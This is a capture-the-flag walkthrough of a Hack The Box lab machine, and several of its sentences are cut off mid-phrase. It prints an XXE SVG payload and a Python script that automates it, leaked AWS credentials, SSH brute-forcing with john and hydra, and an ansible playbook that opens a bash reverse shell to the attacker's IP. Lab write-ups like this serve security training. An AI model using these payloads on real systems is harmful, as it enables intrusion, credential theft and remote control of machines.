Walkthrough User
We are provided with an ip address. After running
If we download a file we get redirected to a download page on a different subdomain:
Looking more around we find a page that gives us a small hint:
It says "Files scanned for malicious content and rogue metadata." This hints that the website might be vulnerable to some kind of metadata attack. We are allowed to upload files of the types pdf, docx, png and svg.
The next step was to upload files with modified metadata and see how the server responds. If we upload a svg file with broken metadata, the server responds with an upload error. This indicates that the server is parsing the file.
We then tried a lot of different payloads to see if we can get any kind of malicious behavior. Fortunately, we found that the server was vulnerable to a XXE attack. The payload we used was:
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY example SYSTEM "/etc/passwd"> ]>
<data>&example;</data>
This payload reads the
To make it easier to look around the server, we can write a small script that takes a command as an argument and uploads a svg file with the XXE payload to the server.
import sys
import requests
import base64
command = sys.argv[1]
url = 'http://clouded.htb/upload/prod/lambda'
# create svg
svg = f'''<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY example SYSTEM "{command}">]>
<data>&example;</data>
'''
# URL-encode the SVG content
svg_urlencoded = base64.b64encode(svg.encode()).decode()
# upload to server
data = {
'filename': 'xxe.svg',
'fileData': svg_urlencoded
}
response = requests.post(url, json=data, verify=False)
print(response.text)
if (response.status_code != 200):
exit(1)
download_url = response.json()['url']
response = requests.get(download_url, verify=False)
print(response.text)
We can then use this script to read files on the server:
python3 xxe.py "file:///etc/passwd"
After looking around the server, we find the
<data>
AWS_LAMBDA_FUNCTION_VERSION=$LATEST
EDGE_PORT=4566
HOSTNAME=340ff67c4b6e
_LAMBDA_CONTROL_SOCKET=14
AWS_LAMBDA_FUNCTION_TIMEOUT=10
LOCALSTACK_HOSTNAME=172.18.0.2
AWS_LAMBDA_LOG_GROUP_NAME=/aws/lambda/UploadToS3
LAMBDA_TASK_ROOT=/var/task
LD_LIBRARY_PATH=/var/lang/lib:/lib64:/usr/lib64:/var/runtime:/var/runtime/lib:/var/task:/var/task/lib:/opt/lib
AWS_LAMBDA_RUNTIME_API=127.0.0.1:9001
AWS_LAMBDA_LOG_STREAM_NAME=2024/12/14/[$LATEST]d9872ade9cb1199e1c90285db195c64e
_LAMBDA_SHARED_MEM_FD=11
AWS_EXECUTION_ENV=AWS_Lambda_python3.8
_LAMBDA_RUNTIME_LOAD_TIME=1530232235231
AWS_XRAY_DAEMON_ADDRESS=169.254.79.2:2000
AWS_LAMBDA_FUNCTION_NAME=
UploadToS3PATH=/var/lang/bin:/usr/local/bin:/usr/bin/:/bin:/opt/bin
_LAMBDA_LOG_FD=9
AWS_DEFAULT_REGION=us-east-1
PWD=/var/task
AWS_SECRET_ACCESS_KEY=eDjlDHTtnOELI/L3FRMENG/dFxLujMjUSTaCHILLGUY
LAMBDA_RUNTIME_DIR=/var/runtime
LANG=en_US.UTF-8TZ=:UTC
AWS_REGION=us-east-1
AWS_ACCESS_KEY_ID=AKIA5M34BDN8GCJGRFFB
SHLVL=0
HOME=/home/sbx_user1051
AWS_LAMBDA_FUNCTION_INVOKED_ARN=arn:aws:lambda:us-east-1:000000000000:function:UploadToS3
_AWS_XRAY_DAEMON_ADDRESS=169.254.79.2
_AWS_XRAY_DAEMON_PORT=2000
_X_AMZN_TRACE_ID=Root=1-dc99d00f-c079a84d433534434534ef0d;Parent=91ed514f1e5c03b2;Sampled=1
_LAMBDA_SB_ID=7
AWS_XRAY_CONTEXT_MISSING=
LOG_ERROR_LAMBDA_CONSOLE_SOCKET=16
AWS_LAMBDA_COGNITO_IDENTITY={}
_HANDLER=handler.lambda_handler
DOCKER_LAMBDA_USE_STDIN=1
AWS_LAMBDA_FUNCTION_MEMORY_SIZE=1536
</data>
This file contains the
aws configure --endpoint-url=http://local.clouded.htb
# enter credentials from env
aws --endpoint-url=http://local.clouded.htb s3 ls
AWS Access Key ID [****************temp]: AKIA5M34BDN8GCJGRFFB
AWS Secret Access Key [****************temp]: eDjlDHTtnOELI/L3FRMENG/dFxLujMjUSTaCHILLGUY
Default region name [temp]: us-east-1
Default output format [temp]: json
2024-12-14 03:45:41 uploads
2024-12-14 03:45:44 clouded-internal
After looking around we find a database backup, which we can download:
aws --endpoint-url=http://local.clouded.htb s3 cp s3://clouded-internal/backup.db .
The database contains
john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 hashes.txt
After cracking the passwords, we bruteforce all user passwords combinations to login via
NOTE: We originally only tried to use first_name:password combinations to login via
Because this didn't work, we tried to login with all user:password combinations while user can be any combination of first_name and last_name with or without a dot in between and more.
The script that we used to generate all possible combinations is:
def subsequences(a):
yield a[0]
yield a
yield ""
name_map = dict()
with open("full_name.txt", "r") as full_names:
for line in full_names.readlines():
a, b = line.split()[:2]
name_map[a.lower()] = b.lower()
out = set()
with open("name:pass.txt", "r") as creds:
for line in creds.readlines():
name, pw = line.split(':')
m_name = name_map[name]
for x in subsequences(name):
for y in subsequences(m_name):
for sep in ["", ".", "_"]:
if x and (y or not sep):
out.add(x + sep + y + ":" + pw.strip())
if y and (x or not sep):
out.add(y + sep + x + ":" + pw.strip())
print(*out, sep="\n")
We can now use hydra to bruteforce the ssh login:
hydra -C pwn_creds.txt clouded.htb ssh -v
This gives us the valid login
We can now login via ssh and get the user flag.
Walkthrough Root
We use
python3 /usr/bin/ansible-playbook /opt/infra-setup/checkup.yml
We can modify the
- hosts: localhost
tasks:
- name: Reverse shell
command: /bin/bash -c 'bash -i >& /dev/tcp/<attacker_ip>/<attacker_port> 0>&1'
The cronjobs also overwrite the
touch /opt/infra-setup/checkup.yml.bak
echo "- hosts: localhost" > /opt/infra-setup/checkup.yml.bak
echo " tasks:" >> /opt/infra-setup/checkup.yml.bak
echo " - name: Reverse shell" >> /opt/infra-setup/checkup.yml.bak
echo " command: /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.11/8888 0>&1'" >> /opt/infra-setup/checkup.yml.bak
while true; do
rm /opt/infra-setup/checkup.yml
cp /opt/infra-setup/checkup.yml.bak /opt/infra-setup/checkup.yml
sleep 4
done
We use
nc -lvnp 8888
After a bit of time,... BOOM! We get a root shell!
nc -lvnp 8888
listening on [any] 8888 ...
connect to [10.10.14.11] from (UNKNOWN) [10.129.194.198] 51138
bash: cannot set terminal process group (3294): Inappropriate ioctl for device
bash: no job control in this shell
root@clouded:/opt/infra-setup# cat /root/root.txt
cat /root/root.txt
HTB{H@ZY_71ME5_AH3AD}
All done! This challenge was fun but took way longer than it should have. Firstly because finding the correct injection point was tedious and secondly because we ignored last_name in the bruteforce attack and got lost in the rabbit hole of trying to escape the docker. It was an easy challenge but we made it hard for ourselves.